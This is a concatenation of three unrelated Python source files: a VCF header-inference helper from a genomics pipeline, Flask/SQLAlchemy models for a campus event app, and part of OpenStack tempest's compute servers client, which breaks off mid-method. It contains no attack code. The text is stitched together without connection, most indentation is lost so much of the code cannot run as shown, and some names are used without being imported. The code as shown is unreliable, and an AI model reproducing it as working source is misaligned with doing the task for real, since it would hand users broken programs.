from gcp_variant_transforms.beam_io import vcf_parser
from gcp_variant_transforms.beam_io import vcfio # pylint: disable=unused-import
from gcp_variant_transforms.libs import vcf_field_conflict_resolver
from gcp_variant_transforms.libs.annotation import annotation_parser
_FIELD_COUNT_ALTERNATE_ALLELE = vcf_parser.FIELD_COUNT_ALTERNATE_ALLELE
# Alias for the header key/type constants to make referencing easier.
_HeaderKeyConstants = vcf_header_io.VcfParserHeaderKeyConstants
_HeaderTypeConstants = vcf_header_io.VcfHeaderFieldTypeConstants
_PysamHeaderKeyConstants = vcf_header_io.PysamHeaderKeyConstants
# Filled with annotation field and name data, then used as a header ID.
_BASE_ANNOTATION_TYPE_KEY = '{}_{}_TYPE'
def get_inferred_annotation_type_header_key(annot_field, name):
# type: (str, str) -> str
"""Creates ID values for annotation type info headers.
Args:
annot_field: field name representing annotation field (e.g. 'CSQ').
name: annotation data field names (e.g. 'IMPACT').
Returns:
Info ID value (e.g. CSQ_IMPACT_TYPE).
"""
return _BASE_ANNOTATION_TYPE_KEY.format(annot_field, name)
def infer_info_fields(
variant, # type: vcfio.Variant
defined_headers, # type: vcf_header_io.VcfHeader
infer_headers=False, # type: bool
annotation_fields_to_infer=None # type: Optional[List[str]]
):
"""Returns inferred info fields.
Up to three types of info fields are inferred:
if `infer_headers` is True:
- The info fields are undefined in the headers.
  - The info fields' definitions provided by the header do not match the
    field values.
  if `annotation_fields_to_infer` is given:
- Fields containing type information of corresponding annotation Info
fields.
Args:
variant: variant object
defined_headers: header fields defined in header section of VCF files.
infer_headers: If true, header fields are inferred from variant data.
annotation_fields_to_infer: list of info fields treated as annotation
fields (e.g. ['CSQ', 'CSQ_VT']).
Returns:
infos: dict of (info_key, `Info`) for any info field in
`variant` that is not defined in the header or the definition mismatches
the field values.
"""
infos = {}
if infer_headers:
_infer_non_annotation_info_fields(variant, infos, defined_headers)
if annotation_fields_to_infer:
_infer_annotation_type_info_fields(
variant, infos, defined_headers, annotation_fields_to_infer)
return infos
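# A hedged call sketch (the variant and headers are assumed to come from the
# beam_io readers used elsewhere in this package):
#   inferred = infer_info_fields(
#       variant, defined_headers, infer_headers=True,
#       annotation_fields_to_infer=['CSQ'])
# `inferred` maps info keys to header fields that must be added or corrected.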
def infer_format_fields(
variant, # type: vcfio.Variant
defined_headers # type: vcf_header_io.VcfHeader
):
# type: (...) -> Dict[str, vcf_header_io.VcfHeaderFormatField]
"""Returns inferred format fields.
Two types of format fields are inferred:
- The format fields are undefined in the headers.
- The format definition provided by the headers does not match the field
values.
Args:
variant: variant object
defined_headers: header fields defined in header section of VCF files.
Returns:
A dict of (format_key, `Format`) for any format key in
`variant` that is not defined in the header or the definition mismatches
the field values.
"""
formats = {}
if defined_headers and defined_headers.formats:
for format_key, format_value in defined_headers.formats.items():
formats[format_key] = vcf_header_io.CreateFormatField(
format_key,
format_value[_HeaderKeyConstants.NUM],
format_value[_HeaderKeyConstants.TYPE],
format_value[_HeaderKeyConstants.DESC],
)
updated_formats = {}
for call in variant.calls:
for format_key, format_value in call.info.items():
if format_key not in formats:
logging.warning('Undefined FORMAT field "%s" in variant "%s"',
format_key, str(variant))
formats[format_key] = vcf_header_io.CreateFormatField(
format_key,
_get_field_count(format_value),
_get_field_type(format_value))
updated_formats[format_key] = formats[format_key]
else:
defined_header = formats[format_key]
corrected_format = _infer_mismatched_format_field(
format_key, format_value, defined_header)
if corrected_format:
logging.warning(
'Adjusting FORMAT field "%s". Defined as "type=%s,num=%s", '
'got "%s" in variant "%s"',
format_key, defined_header.record[_PysamHeaderKeyConstants.TYPE],
str(defined_header.record[_PysamHeaderKeyConstants.NUM]),
str(format_value), str(variant))
formats[format_key] = corrected_format
updated_formats[format_key] = formats[format_key]
return updated_formats
def _get_field_count(field_value):
  # type: (Union[List, bool, int, str]) -> Union[int, str]
"""
Args:
field_value: value for the field. E.g. [0.33, 0.66] is a field value for
Allele frequency (AF) field.
"""
if isinstance(field_value, list):
return '.'
elif isinstance(field_value, bool):
return 0
else:
return 1
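# Hedged illustration of the branches above:
#   _get_field_count([0.33, 0.66]) returns '.'  (repeated values, unknown count)
#   _get_field_count(True)         returns 0    (flag fields carry no value)
#   _get_field_count('PASS')       returns 1    (any other scalar)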
def _get_field_type(field_value):
"""
Args:
field_value (list, bool, integer, or string): value for the field. E.g.
[0.33, 0.66] is a field value for Allele frequency (AF) field.
"""
if isinstance(field_value, list):
return (_get_field_type(field_value[0]) if field_value else
vcf_header_io.VcfHeaderFieldTypeConstants.STRING)
if isinstance(field_value, bool):
return vcf_header_io.VcfHeaderFieldTypeConstants.FLAG
elif isinstance(field_value, int):
return vcf_header_io.VcfHeaderFieldTypeConstants.INTEGER
elif isinstance(field_value, float):
return vcf_header_io.VcfHeaderFieldTypeConstants.FLOAT
elif _can_cast_to(field_value, int):
return vcf_header_io.VcfHeaderFieldTypeConstants.INTEGER
elif _can_cast_to(field_value, float):
return vcf_header_io.VcfHeaderFieldTypeConstants.FLOAT
else:
return vcf_header_io.VcfHeaderFieldTypeConstants.STRING
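# Hedged illustration of the inference above:
#   _get_field_type(True)   -> VcfHeaderFieldTypeConstants.FLAG
#   _get_field_type('7')    -> VcfHeaderFieldTypeConstants.INTEGER (castable str)
#   _get_field_type('0.5')  -> VcfHeaderFieldTypeConstants.FLOAT
#   _get_field_type([])     -> VcfHeaderFieldTypeConstants.STRING (empty default)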
def _can_cast_to(value, cast_type):
"""Returns true if `value` can be casted to type `type`"""
try:
_ = cast_type(str(value))
return True
except (ValueError, TypeError):
return False
def _get_corrected_type(defined_type, value):
# type: (str, Any) -> str
"""Returns the corrected type according to `defined_type` and `value`.
  For lists we recursively find types for the underlying elements and pick a
  "smallest common denominator" type.
  If the expected type is integer, we make sure that the value is either int,
  float that could be converted to int, or string that could be converted to
  int. Similarly, if the expected type is float we verify that the value is
  either float or a str representation of a float number (note that if value
  is int, the preferred type will remain float).
  For the expected type of Flag we verify that the value is bool.
  If the field is absent, it can be of any type, so we keep the expected type.
  Finally, if we encounter a non-numeric str, or two types that cannot be
  stored together (i.e. Flag and Integer), we return the String type.
"""
if isinstance(value, list):
corrected_type = defined_type
for item in value:
corrected_type = _get_corrected_type(corrected_type, item)
return corrected_type
if value is None:
return defined_type
if defined_type == _HeaderTypeConstants.FLAG and isinstance(value, bool):
return defined_type
if defined_type == _HeaderTypeConstants.INTEGER:
if isinstance(value, int):
return defined_type
if isinstance(value, float):
if value.is_integer():
return _HeaderTypeConstants.INTEGER
return _HeaderTypeConstants.FLOAT
if isinstance(value, str):
if _can_str_be_int(value):
return defined_type
if _can_str_be_float(value):
return _HeaderTypeConstants.FLOAT
if defined_type == _HeaderTypeConstants.FLOAT and (
isinstance(value, (int, float)) or
(isinstance(value, str) and _can_str_be_float(value))):
return _HeaderTypeConstants.FLOAT
return _HeaderTypeConstants.STRING
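# Hedged illustration of the correction rules above:
#   _get_corrected_type(_HeaderTypeConstants.INTEGER, 2.5)  -> FLOAT
#   _get_corrected_type(_HeaderTypeConstants.INTEGER, 2.0)  -> INTEGER
#   _get_corrected_type(_HeaderTypeConstants.FLOAT, 'abc')  -> STRING
#   _get_corrected_type(_HeaderTypeConstants.FLAG, None)    -> FLAG (absent field)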
def _can_str_be_int(value):
if value is None:
return True
try:
_ = int(value)
return True
except ValueError:
return False
def _can_str_be_float(value):
if value is None:
return True
try:
_ = float(value)
return True
except ValueError:
return False
def _infer_mismatched_info_field(field_key, # type: str
field_value, # type: Any
defined_header, # type: Dict
num_alternate_bases # type: int
):
# type: (...) -> Optional[vcf_header_io.VcfHeaderInfoField]
"""Returns corrected info if there are mismatches.
Two mismatches are handled:
- Defined num is `A`, but the provided values do not have the same
cardinality as the alternate bases. Correct the num to be `.`.
- Defined type is `Integer`, but the provided value is float. Correct the
type to be `Float`.
Args:
field_key: the info field key.
field_value: the value of the field key given in the variant.
defined_header: The definition of `field_key` in the header.
num_alternate_bases: number of the alternate bases.
Returns:
Corrected info definition if there are mismatches.
"""
corrected_num = defined_header.get(_HeaderKeyConstants.NUM)
if (corrected_num == _FIELD_COUNT_ALTERNATE_ALLELE and
len(field_value) != num_alternate_bases):
corrected_num = '.'
corrected_type = _get_corrected_type(
defined_header.get(_HeaderKeyConstants.TYPE), field_value)
if (corrected_type != defined_header.get(_HeaderKeyConstants.TYPE) or
corrected_num != defined_header.get(_HeaderKeyConstants.NUM)):
return vcf_header_io.CreateInfoField(
field_key,
corrected_num,
corrected_type,
defined_header.get(_HeaderKeyConstants.DESC),
defined_header.get(_HeaderKeyConstants.SOURCE),
defined_header.get(_HeaderKeyConstants.VERSION))
return None
def _infer_mismatched_format_field(field_key, field_value, defined_header):
# type: (str, Any, Dict) -> Optional[vcf_header_io.VcfHeaderFormatField]
"""Returns corrected format if there are mismatches.
One type of mismatches is handled:
- Defined type is `Integer`, but the provided value is float. Correct the
type to be `Float`.
Args:
field_key: the format field key.
field_value: the value of the field key given in the variant.
defined_header: The definition of `field_key` in the header.
Returns:
Corrected format definition if there are mismatches.
"""
corrected_type = _get_corrected_type(
defined_header.record[_PysamHeaderKeyConstants.TYPE], field_value)
if corrected_type != defined_header.record[_PysamHeaderKeyConstants.TYPE]:
return vcf_header_io.CreateFormatField(
field_key,
defined_header.record[_PysamHeaderKeyConstants.NUM],
corrected_type,
defined_header.record[_PysamHeaderKeyConstants.DESC])
return None
def _infer_non_annotation_info_fields(
variant, # type: vcfio.Variant
infos, # type: Dict[str, vcf_header_io.VcfHeaderInfoField]
defined_headers # type: vcf_header_io.VcfHeader
):
# type: (...) -> None
"""Updates `infos` with inferred info fields.
Two types of info fields are inferred:
- The info fields are undefined in the headers.
  - The info fields' definitions provided by the header do not match the
    field values.
Args:
variant: variant object
infos: dict of (info_key, `Info`) for any info field in
`variant` that is not defined in the header or the definition mismatches
the field values.
defined_headers: header fields defined in header section of VCF files.
"""
for info_field_key, info_field_value in variant.info.items():
if not defined_headers or info_field_key not in defined_headers.infos:
if info_field_key in infos:
raise ValueError(
'Duplicate INFO field "{}" in variant "{}"'.format(
info_field_key, variant))
logging.warning('Undefined INFO field "%s" in variant "%s"',
info_field_key, str(variant))
infos[info_field_key] = vcf_header_io.CreateInfoField(
info_field_key,
_get_field_count(info_field_value),
_get_field_type(info_field_value))
else:
defined_header = defined_headers.infos.get(info_field_key)
corrected_info = _infer_mismatched_info_field(
info_field_key, info_field_value,
defined_header, len(variant.alternate_bases))
if corrected_info:
logging.warning(
'Incorrect INFO field "%s". Defined as "type=%s,num=%s", '
'got "%s", in variant "%s"',
info_field_key, defined_header.get(_HeaderKeyConstants.TYPE),
str(defined_header.get(_HeaderKeyConstants.NUM)),
str(info_field_value), str(variant))
infos[info_field_key] = corrected_info
def _infer_annotation_type_info_fields(
variant, # type: vcfio.Variant
infos, # type: Dict[str, vcf_header_io.VcfHeaderInfoField]
defined_headers, # type: vcf_header_io.VcfHeader
annotation_fields_to_infer # type: List[str]
):
# type: (...) -> None
"""Updates `infos` with inferred annotation type info fields.
All annotation headers in each annotation field are converted to Info header
lines where the new ID corresponds to the given annotation field and header,
  and the new TYPE corresponds to the inferred type of the original header. Since
each variant potentially contains multiple values for each annotation
header, a small 'merge' of value types is performed before VcfHeader
creation for each variant.
Args:
variant: variant object
infos: dict of (info_key, `Info`) for any info field in
`variant` that is not defined in the header or the definition mismatches
the field values.
defined_headers: header fields defined in header section of VCF files.
annotation_fields_to_infer: list of info fields treated as annotation
fields (e.g. ['CSQ', 'CSQ_VT']).
"""
def _check_annotation_lists_lengths(names, values):
lengths = set(len(v) for v in values)
lengths.add(len(names))
if len(lengths) != 1:
error = ('Annotation lists have inconsistent lengths: {}.\nnames={}\n'
'values={}').format(lengths, names, values)
raise ValueError(error)
resolver = vcf_field_conflict_resolver.FieldConflictResolver(
resolve_always=True)
for field in annotation_fields_to_infer:
if field not in variant.info:
continue
annotation_names = annotation_parser.extract_annotation_names(
defined_headers.infos[field][_HeaderKeyConstants.DESC])
# First element (ALT) is ignored, since its type is hard-coded as string
annotation_values = [annotation_parser.extract_annotation_list_with_alt(
annotation)[1:] for annotation in variant.info[field]]
_check_annotation_lists_lengths(annotation_names, annotation_values)
annotation_values = list(zip(*annotation_values))
for name, values in zip(annotation_names, annotation_values):
variant_merged_type = '.'
for v in values:
if not v:
continue
variant_merged_type = resolver.resolve_attribute_conflict(
_HeaderKeyConstants.TYPE,
variant_merged_type,
_get_field_type(v))
if variant_merged_type == _HeaderTypeConstants.STRING:
break
key_id = get_inferred_annotation_type_header_key(
field, name)
infos[key_id] = vcf_header_io.CreateInfoField(
key_id,
1, # field count
variant_merged_type,
('Inferred type field for annotation {}.'.format(name)))
|
|
from datetime import datetime, timedelta, time
from dateutil import tz
import hashlib
from werkzeug.security import generate_password_hash, check_password_hash
from flask import current_app, request, url_for
from flask.ext.login import UserMixin, AnonymousUserMixin
from .extensions import db, login_manager
#from .tasks import event_notify
class Permission:
ADMINISTER = 0x80
class Role(db.Model):
__tablename__ = 'role'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
default = db.Column(db.Boolean, default=False, index=True)
permissions = db.Column(db.Integer)
users = db.relationship('User', backref='role', lazy='dynamic')
@staticmethod
def insert_roles():
roles = {
'Administrator': (0xff, False)
}
for r in roles:
role = Role.query.filter_by(name=r).first()
if role is None:
role = Role(name=r)
role.permissions = roles[r][0]
role.default = roles[r][1]
db.session.add(role)
db.session.commit()
def __repr__(self):
return self.name
attendees = db.Table('attendees',
db.Column('user_id', db.Integer, db.ForeignKey('user.id')),
db.Column('event_id', db.Integer, db.ForeignKey('event.id'))
)
class User(UserMixin, db.Model):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True)
email = db.Column(db.String(64), unique=True, index=True)
username = db.Column(db.String(64), unique=True, index=True)
phone = db.Column(db.Integer, unique=True)
email_notifications = db.Column(db.Boolean)
password_hash = db.Column(db.String(128))
confirmed = db.Column(db.Boolean, default=False)
    member_since = db.Column(db.DateTime(), default=datetime.utcnow)
location_id = db.Column(db.Integer, db.ForeignKey('location.id'))
submitted = db.relationship('Event', backref='author', lazy='dynamic')
role_id = db.Column(db.Integer, db.ForeignKey('role.id'))
    def __init__(self, **kwargs):
        super(User, self).__init__(**kwargs)
        # Auto confirm for now
        self.confirmed = True
def is_attending(self, eventId):
e = Event.query.get(eventId)
if self in e.attendees:
return True
else:
return False
@property
def password(self):
raise AttributeError('password is not a readable attribute')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
@staticmethod
def generate_fake(count=10, loc=None):
from sqlalchemy.exc import IntegrityError
from random import seed
import random
import forgery_py
seed()
for i in range(count):
u = User()
u.email=forgery_py.internet.email_address()
u.username=forgery_py.internet.user_name(True)
u.password=forgery_py.lorem_ipsum.word()
u.confirmed=True
if loc == None:
u.location_id=Location.query.get(random.randrange(1, Location.query.count())).id
else:
u.location_id=loc
u.member_since=forgery_py.date.date(True)
db.session.add(u)
try:
db.session.commit()
except IntegrityError:
db.session.rollback()
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
def can(self, permissions):
return self.role is not None and \
(self.role.permissions & permissions) == permissions
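    # Hedged illustration: user.can(Permission.ADMINISTER) is True only when
    # the user's role has the 0x80 bit set (e.g. the 'Administrator' role
    # created by Role.insert_roles(), whose permissions value is 0xff).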
def __repr__(self):
return self.username
def __hash__(self):
return id(self)
# Flask-Login integration
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return self.id
@staticmethod
def make_admin(email):
user = User.query.filter_by(email=email).first()
user.role_id = Role.query.filter_by(name="Administrator").first().id
db.session.commit()
def num_submitted(self):
return self.submitted.count()
def to_json(self):
json_post = {
'id' : self.id,
'email' : self.email,
'member_since' : self.member_since,
'location_id' : self.location_id
}
return json_post
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class Event(db.Model):
__tablename__ = 'event'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(128), index=True)
serving = db.Column(db.String(128))
place = db.Column(db.String(128))
time = db.Column(db.DateTime, index=True)
body = db.Column(db.Text)
    timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)
    # Store the ids of the event's location and of the user who submitted it
location_id = db.Column(db.Integer, db.ForeignKey('location.id'))
author_id = db.Column(db.Integer, db.ForeignKey('user.id'))
attendees = db.relationship('User', secondary=attendees, backref=db.backref('events', lazy='dynamic'))
def __hash__(self):
return id(self)
    @staticmethod
    def generate_fake(count=100, loc=None):
from sqlalchemy.exc import IntegrityError
from random import seed
import random
import forgery_py
rand_name = ["Party!", "Study Session", "Gosnell Open House", "Student Gov Event"]
rand_locs = ["GOS 3365", "CAR 1250", "BRN 352", "ORN 107", "GOL 3200", "EAS 1243", "Library Lobby", "Infinity Quad", "Field House"]
rand_serv = ["Pizza", "Pizza", "Pizza and snacks", "Snacks", "BBQ", "Hamburgers and Hotdogs"]
seed()
for i in range(count):
e = Event()
#e.name=forgery_py.lorem_ipsum.word()
#e.serving=forgery_py.lorem_ipsum.word()
#e.place=forgery_py.lorem_ipsum.word()
e.name = rand_name[random.randint(0,len(rand_name)-1)]
e.serving = rand_serv[random.randint(0,len(rand_serv)-1)]
e.place = rand_locs[random.randint(0,len(rand_locs)-1)]
e.time= datetime.combine(forgery_py.date.date(past=False), time(hour=random.randrange(0,23),minute=random.randrange(0,59)))
e.body=forgery_py.lorem_ipsum.sentence()
e.author_id=User.query.get(random.randrange(1, User.query.count())).id
if loc == None:
e.location_id=Location.query.get(random.randrange(1, Location.query.count())).id
else:
e.location_id=loc
db.session.add(e)
if not i % 100:
print(i)
try:
db.session.commit()
except IntegrityError:
db.session.rollback()
    @staticmethod
    def future_events(location_id):
""" Returns all future events """
# Autodetects timezone and lists events in the future
from_zone = tz.tzutc()
to_zone = tz.tzlocal()
utc = datetime.utcnow()
utc = utc.replace(tzinfo=from_zone)
actual = utc.astimezone(to_zone)
all_events = Event.query.filter_by(location_id=location_id)
return all_events.filter(Event.time>actual).all()
def __repr__(self):
return self.name
def attend_event(self, user_id):
""" Adds a user to an event's attendees """
u = User.query.get(user_id)
self.attendees.append(u)
# Create a notification event
# TODO: check if user wants notifications
# Have to make local to utc
to_zone = tz.tzutc()
from_zone = tz.tzlocal()
utc = self.time
utc = utc.replace(tzinfo=from_zone)
alarm = utc.astimezone(to_zone)
# Notify 30 min before event
alarm = alarm - timedelta(minutes=30)
#event_notify.apply_async( (u.username, alarm), eta=alarm )
db.session.add(self)
db.session.commit()
def unattend_event(self, user_id):
""" Removes a user from an event's attendees """
self.attendees.remove(User.query.get(user_id))
db.session.commit()
def num_attendees(self):
""" Returns the number of attendees going to an event """
num = len(self.attendees)
return num
def to_json(self):
json_post = {
'id' : self.id,
'author_id' : self.author_id,
'location_id' : self.location_id,
'name' : self.name,
'place' : self.place,
'serving' : self.serving,
'time' : self.time,
'timestamp' : self.timestamp,
'body' : self.body
}
return json_post
class Location(db.Model):
__tablename__ = 'location'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(128), index=True)
url = db.Column(db.String(128))
# Store the users and events that belong to this location
users = db.relationship('User', backref='location', lazy='dynamic')
events = db.relationship('Event', backref='location', lazy='dynamic')
def __repr__(self):
return self.name
def to_json(self):
json_post = {
'id' : self.id,
'name' : self.name
}
return json_post
def num_events(self):
return self.events.count()
def num_users(self):
return self.users.count()
def __hash__(self):
return id(self)
class AnonymousUser(AnonymousUserMixin):
def can(self, permissions):
return False
def is_administrator(self):
return False
def is_authenticated(self):
return False
login_manager.anonymous_user = AnonymousUser
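# Hedged usage sketch (assumes an application context and a seeded database;
# the ids below are placeholders):
#   Role.insert_roles()
#   upcoming = Event.future_events(location_id=1)
#   upcoming[0].attend_event(user_id=2)   # RSVP a user to the event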
|
|
# Copyright 2012 OpenStack Foundation
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# Copyright 2017 AT&T Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from oslo_serialization import jsonutils as json
from six.moves.urllib import parse as urllib
from tempest.lib.api_schema.response.compute.v2_1 import \
security_groups as security_groups_schema
from tempest.lib.api_schema.response.compute.v2_1 import servers as schema
from tempest.lib.api_schema.response.compute.v2_16 import servers as schemav216
from tempest.lib.api_schema.response.compute.v2_19 import servers as schemav219
from tempest.lib.api_schema.response.compute.v2_26 import servers as schemav226
from tempest.lib.api_schema.response.compute.v2_3 import servers as schemav23
from tempest.lib.api_schema.response.compute.v2_47 import servers as schemav247
from tempest.lib.api_schema.response.compute.v2_48 import servers as schemav248
from tempest.lib.api_schema.response.compute.v2_54 import servers as schemav254
from tempest.lib.api_schema.response.compute.v2_57 import servers as schemav257
from tempest.lib.api_schema.response.compute.v2_6 import servers as schemav26
from tempest.lib.api_schema.response.compute.v2_63 import servers as schemav263
from tempest.lib.api_schema.response.compute.v2_70 import servers as schemav270
from tempest.lib.api_schema.response.compute.v2_71 import servers as schemav271
from tempest.lib.api_schema.response.compute.v2_73 import servers as schemav273
from tempest.lib.api_schema.response.compute.v2_8 import servers as schemav28
from tempest.lib.api_schema.response.compute.v2_9 import servers as schemav29
from tempest.lib.common import rest_client
from tempest.lib.services.compute import base_compute_client
class ServersClient(base_compute_client.BaseComputeClient):
"""Service client for the resource /servers"""
schema_versions_info = [
{'min': None, 'max': '2.2', 'schema': schema},
{'min': '2.3', 'max': '2.5', 'schema': schemav23},
{'min': '2.6', 'max': '2.7', 'schema': schemav26},
{'min': '2.8', 'max': '2.8', 'schema': schemav28},
{'min': '2.9', 'max': '2.15', 'schema': schemav29},
{'min': '2.16', 'max': '2.18', 'schema': schemav216},
{'min': '2.19', 'max': '2.25', 'schema': schemav219},
{'min': '2.26', 'max': '2.46', 'schema': schemav226},
{'min': '2.47', 'max': '2.47', 'schema': schemav247},
{'min': '2.48', 'max': '2.53', 'schema': schemav248},
{'min': '2.54', 'max': '2.56', 'schema': schemav254},
{'min': '2.57', 'max': '2.62', 'schema': schemav257},
{'min': '2.63', 'max': '2.69', 'schema': schemav263},
{'min': '2.70', 'max': '2.70', 'schema': schemav270},
{'min': '2.71', 'max': '2.72', 'schema': schemav271},
{'min': '2.73', 'max': None, 'schema': schemav273}]
def __init__(self, auth_provider, service, region,
enable_instance_password=True, **kwargs):
super(ServersClient, self).__init__(
auth_provider, service, region, **kwargs)
self.enable_instance_password = enable_instance_password
def create_server(self, **kwargs):
"""Create server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#create-server
:param name: Server name
:param imageRef: Image reference (UUID)
:param flavorRef: Flavor reference (UUID or full URL)
Most parameters except the following are passed to the API without
any changes.
:param disk_config: The name is changed to OS-DCF:diskConfig
:param scheduler_hints: The name is changed to os:scheduler_hints and
the parameter is set in the same level as the parameter 'server'.
"""
body = copy.deepcopy(kwargs)
if body.get('disk_config'):
body['OS-DCF:diskConfig'] = body.pop('disk_config')
hints = None
if body.get('scheduler_hints'):
hints = {'os:scheduler_hints': body.pop('scheduler_hints')}
post_body = {'server': body}
if hints:
post_body.update(hints)
post_body = json.dumps(post_body)
resp, body = self.post('servers', post_body)
body = json.loads(body)
# NOTE(maurosr): this deals with the case of multiple server create
# with return reservation id set True
if 'reservation_id' in body:
return rest_client.ResponseBody(resp, body)
if self.enable_instance_password:
create_schema = schema.create_server_with_admin_pass
else:
create_schema = schema.create_server
self.validate_response(create_schema, resp, body)
return rest_client.ResponseBody(resp, body)
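    # Hedged call sketch (the identifiers below are placeholders, not defined
    # in this module):
    #   client.create_server(name='vm-1', imageRef=image_id,
    #                        flavorRef=flavor_id, disk_config='AUTO',
    #                        scheduler_hints={'group': group_uuid})
    # posts {'server': {..., 'OS-DCF:diskConfig': 'AUTO'},
    #        'os:scheduler_hints': {...}} to the /servers endpoint.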
def update_server(self, server_id, **kwargs):
"""Update server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#update-server
Most parameters except the following are passed to the API without
any changes.
:param disk_config: The name is changed to OS-DCF:diskConfig
"""
if 'disk_config' in kwargs:
kwargs['OS-DCF:diskConfig'] = kwargs.pop('disk_config')
post_body = json.dumps({'server': kwargs})
resp, body = self.put("servers/%s" % server_id, post_body)
body = json.loads(body)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.update_server, resp, body)
return rest_client.ResponseBody(resp, body)
def show_server(self, server_id):
"""Get server details.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#show-server-details
"""
resp, body = self.get("servers/%s" % server_id)
body = json.loads(body)
schema = self.get_schema(self.schema_versions_info)
self.validate_response(schema.get_server, resp, body)
return rest_client.ResponseBody(resp, body)
def delete_server(self, server_id):
"""Delete server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#delete-server
"""
resp, body = self.delete("servers/%s" % server_id)
self.validate_response(schema.delete_server, resp, body)
return rest_client.ResponseBody(resp, body)
def list_servers(self, detail=False, **params):
"""List servers.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#list-servers
https://docs.openstack.org/api-ref/compute/#list-servers-detailed
"""
url = 'servers'
schema = self.get_schema(self.schema_versions_info)
if detail:
url += '/detail'
_schema = schema.list_servers_detail
else:
_schema = schema.list_servers
if params:
url += '?%s' % urllib.urlencode(params)
resp, body = self.get(url)
body = json.loads(body)
self.validate_response(_schema, resp, body)
return rest_client.ResponseBody(resp, body)
def list_addresses(self, server_id):
"""Lists all addresses for a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#list-ips
"""
resp, body = self.get("servers/%s/ips" % server_id)
body = json.loads(body)
self.validate_response(schema.list_addresses, resp, body)
return rest_client.ResponseBody(resp, body)
def list_addresses_by_network(self, server_id, network_id):
"""Lists all addresses of a specific network type for a server."""
resp, body = self.get("servers/%s/ips/%s" %
(server_id, network_id))
body = json.loads(body)
self.validate_response(schema.list_addresses_by_network, resp, body)
return rest_client.ResponseBody(resp, body)
def action(self, server_id, action_name,
schema=schema.server_actions_common_schema,
**kwargs):
if 'body' in kwargs:
post_body = json.dumps(kwargs['body'])
else:
post_body = json.dumps({action_name: kwargs})
resp, body = self.post('servers/%s/action' % server_id,
post_body)
if body:
body = json.loads(body)
else:
if isinstance(body, bytes):
body = body.decode('utf-8')
self.validate_response(schema, resp, body)
return rest_client.ResponseBody(resp, body)
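    # Hedged illustration: self.action(server_id, 'reboot', type='SOFT') posts
    # {'reboot': {'type': 'SOFT'}} to servers/<id>/action, while passing
    # body={...} sends that dict verbatim instead of wrapping the kwargs.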
def create_backup(self, server_id, **kwargs):
"""Backup a server instance.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#create-server-back-up-createbackup-action
"""
return self.action(server_id, "createBackup", **kwargs)
def change_password(self, server_id, **kwargs):
"""Change the root password for the server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#change-administrative-password-changepassword-action
"""
return self.action(server_id, 'changePassword', **kwargs)
def show_password(self, server_id):
resp, body = self.get("servers/%s/os-server-password" %
server_id)
body = json.loads(body)
self.validate_response(schema.show_password, resp, body)
return rest_client.ResponseBody(resp, body)
def delete_password(self, server_id):
"""Removes the encrypted server password from the metadata server
Note that this does not actually change the instance server
password.
"""
resp, body = self.delete("servers/%s/os-server-password" %
server_id)
self.validate_response(schema.server_actions_delete_password,
resp, body)
return rest_client.ResponseBody(resp, body)
def reboot_server(self, server_id, **kwargs):
"""Reboot a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#reboot-server-reboot-action
"""
return self.action(server_id, 'reboot', **kwargs)
def rebuild_server(self, server_id, image_ref, **kwargs):
"""Rebuild a server with a new image.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#rebuild-server-rebuild-action
Most parameters except the following are passed to the API without
any changes.
:param disk_config: The name is changed to OS-DCF:diskConfig
"""
kwargs['imageRef'] = image_ref
if 'disk_config' in kwargs:
kwargs['OS-DCF:diskConfig'] = kwargs.pop('disk_config')
schema = self.get_schema(self.schema_versions_info)
if self.enable_instance_password:
rebuild_schema = schema.rebuild_server_with_admin_pass
else:
rebuild_schema = schema.rebuild_server
return self.action(server_id, 'rebuild',
rebuild_schema, **kwargs)
def resize_server(self, server_id, flavor_ref, **kwargs):
"""Change the flavor of a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#resize-server-resize-action
Most parameters except the following are passed to the API without
any changes.
:param disk_config: The name is changed to OS-DCF:diskConfig
"""
kwargs['flavorRef'] = flavor_ref
if 'disk_config' in kwargs:
kwargs['OS-DCF:diskConfig'] = kwargs.pop('disk_config')
return self.action(server_id, 'resize', **kwargs)
def confirm_resize_server(self, server_id, **kwargs):
"""Confirm the flavor change for a server.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#confirm-resized-server-confirmresize-action
"""
return self.action(server_id, 'confirmResize',
schema.server_actions_confirm_resize,
**kwargs)
def revert_resize_server(self, server_id, **kwargs):
"""Revert a server back to its original flavor.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/compute/#revert-resized-server-revertresize-action
"""
return self.action(server_id, 'revertResize', **kwargs)
def create_image(self, server_id, name, meta=None):
"""Creates an image of the original server."""
post_body = {
'createImage': {
'name': name,
